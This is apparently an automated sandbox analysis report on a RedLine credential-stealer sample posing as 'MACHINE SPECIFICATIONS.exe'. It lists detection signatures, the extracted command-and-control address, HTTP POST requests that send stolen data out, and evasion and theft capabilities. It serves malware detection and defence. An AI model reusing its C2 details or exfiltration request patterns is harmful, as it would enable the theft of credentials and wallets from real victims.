Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MACHINE SPECIFICATIONS.exe

Overview

General Information

Sample Name:MACHINE SPECIFICATIONS.exe
Analysis ID:633730
MD5:6a54566bf72bc5f07bac04c982dab3e6
SHA1:603a754281efa379d923304ba0e8e551888c2188
SHA256:b618d6a08d5d165812cef6e3f1239b33bd4ab60971c3a41d1da8fc22bfb9ac9a
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • MACHINE SPECIFICATIONS.exe (PID: 6376 cmdline: "C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe" MD5: 6A54566BF72BC5F07BAC04C982DAB3E6)
    • MACHINE SPECIFICATIONS.exe (PID: 6432 cmdline: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe MD5: 6A54566BF72BC5F07BAC04C982DAB3E6)
      • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000001.00000000.258866341.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 20 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1048a:$u7: RunPE
                      • 0x13b41:$u8: DownloadAndEx
                      • 0x9130:$pat14: , CommandLine:
                      • 0x13079:$v2_1: ListOfProcesses
                      • 0x1068b:$v2_2: get_ScanVPN
                      • 0x1072e:$v2_2: get_ScanFTP
                      • 0x1141e:$v2_2: get_ScanDiscord
                      • 0x1240c:$v2_2: get_ScanSteam
                      • 0x12428:$v2_2: get_ScanTelegram
                      • 0x124ce:$v2_2: get_ScanScreen
                      • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                      • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                      • 0x13509:$v2_2: get_ScanBrowsers
                      • 0x135ca:$v2_2: get_ScannedWallets
                      • 0x135f0:$v2_2: get_ScanWallets
                      • 0x13610:$v2_3: GetArguments
                      • 0x11cd9:$v2_4: VerifyUpdate
                      • 0x165e6:$v2_4: VerifyUpdate
                      • 0x139ca:$v2_5: VerifyScanRequest
                      • 0x130c6:$v2_6: GetUpdates
                      • 0x165c7:$v2_6: GetUpdates
                      0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 40 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}
                        Multi AV Scanner detection for submitted file
                        Source: MACHINE SPECIFICATIONS.exeVirustotal: Detection: 19%Perma Link
                        Source: MACHINE SPECIFICATIONS.exeReversingLabs: Detection: 14%

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6376, type: MEMORYSTR
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                        Source: Binary string: E:\A\_work\974\s\artifacts\NuGet.Frameworks\16.0\obj\release\net472\NuGet.Frameworks.pdb source: MACHINE SPECIFICATIONS.exe

                        Networking

                        barindex
                        Uses known network protocols on non-standard ports
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPE
                        Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1133614Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1133606Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficTCP traffic: 192.168.2.3:49739 -> 185.222.58.90:17910
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:1
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365714894.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910/
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://forms.rea
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365800407.0000000003487000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.r
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.a
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365714894.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/t_$k
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
